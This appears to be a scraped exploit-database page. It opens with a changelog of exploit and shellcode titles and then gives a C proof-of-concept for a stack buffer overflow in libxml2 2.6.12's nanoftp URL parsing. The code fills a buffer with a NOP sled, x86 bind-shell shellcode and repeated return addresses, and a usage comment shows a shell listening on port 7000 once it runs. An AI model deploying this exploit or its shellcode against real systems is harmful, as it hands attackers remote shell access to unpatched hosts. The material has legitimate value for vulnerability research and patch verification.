
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
87 lines
No EOL
2.8 KiB
C
87 lines
No EOL
2.8 KiB
C
// source: https://www.securityfocus.com/bid/11526/info
|
|
|
|
The 'libxml2' library is reported prone to multiple remote stack-based buffer-overflow vulnerabilities caused by insufficient boundary checks. Remote attackers may exploit these issues to execute arbitrary code on a vulnerable computer.
|
|
|
|
The URI parsing functionality and the DNS name resolving code are affected.
|
|
|
|
These issues affect libxml2 2.6.12 through 2.6.14. Other versions may also be affected.
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
/*
|
|
* libxml 2.6.12 nanoftp bof POC infamous42mdAThotpopDOTcom
|
|
*
|
|
* [n00b@localho.outernet] gcc -Wall libsuxml.c -lxml2
|
|
* [n00b@localho.outernet] ./a.out
|
|
* Usage: ./a.out <retaddr> [ align ]
|
|
* [n00b@localho.outernet] netstat -ant | grep 7000
|
|
* [n00b@localho.outernet] ./a.out 0xbfff0360
|
|
* xmlNanoFTPScanURL: Use [IPv6]/IPv4 format
|
|
* [n00b@localho.outernet] netstat -ant | grep 7000
|
|
* tcp 0 0 0.0.0.0:7000 0.0.0.0:* LISTEN
|
|
*
|
|
*/
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <unistd.h>
|
|
#include <netinet/in.h>
|
|
#include <sys/socket.h>
|
|
#include <sys/types.h>
|
|
#include <libxml/nanoftp.h>
|
|
|
|
#define die(x) do{ perror((x)); exit(1); }while(0)
|
|
#define BS 0x10000
|
|
#define NOP 0x90
|
|
#define NNOPS 3000
|
|
#define ALIGN 0
|
|
|
|
/* call them */
|
|
#define SHELL_LEN (sizeof(sc)-1)
|
|
char sc[] =
|
|
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
|
|
"\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
|
|
"\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
|
|
"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
|
|
"\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
|
|
"\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
|
|
"\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
|
|
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
|
|
|
|
|
|
/*
|
|
*/
|
|
int main(int argc, char **argv)
|
|
{
|
|
int x = 0, len = 0;
|
|
char buf[BS] = {'A',};
|
|
long retaddr = 0, align = ALIGN;
|
|
|
|
if(argc < 2){
|
|
fprintf(stderr, "Usage: %s <retaddr> [ align ]\n", argv[0]);
|
|
return EXIT_FAILURE;
|
|
}
|
|
if(sscanf(argv[1], "%lx", &retaddr) != 1)
|
|
die("sscanf");
|
|
if(argc > 2)
|
|
align = atoi(argv[2]);
|
|
if(align < 0 || align > 3)
|
|
die("nice try newblar");
|
|
|
|
strncpy(buf, "://[", 4);
|
|
len += 4;
|
|
memset(buf+len, NOP, NNOPS);
|
|
len += NNOPS;
|
|
memcpy(buf+len, sc, SHELL_LEN);
|
|
len += SHELL_LEN;
|
|
|
|
len += align;
|
|
for(x = 0; x < 2000 - (sizeof(retaddr) - 1); x += sizeof(retaddr))
|
|
memcpy(buf+len+x, &retaddr, sizeof(retaddr));
|
|
buf[len+x] = ']';
|
|
buf[len+x+1] = 0;
|
|
|
|
xmlNanoFTPNewCtxt(buf);
|
|
|
|
return EXIT_SUCCESS;
|
|
} |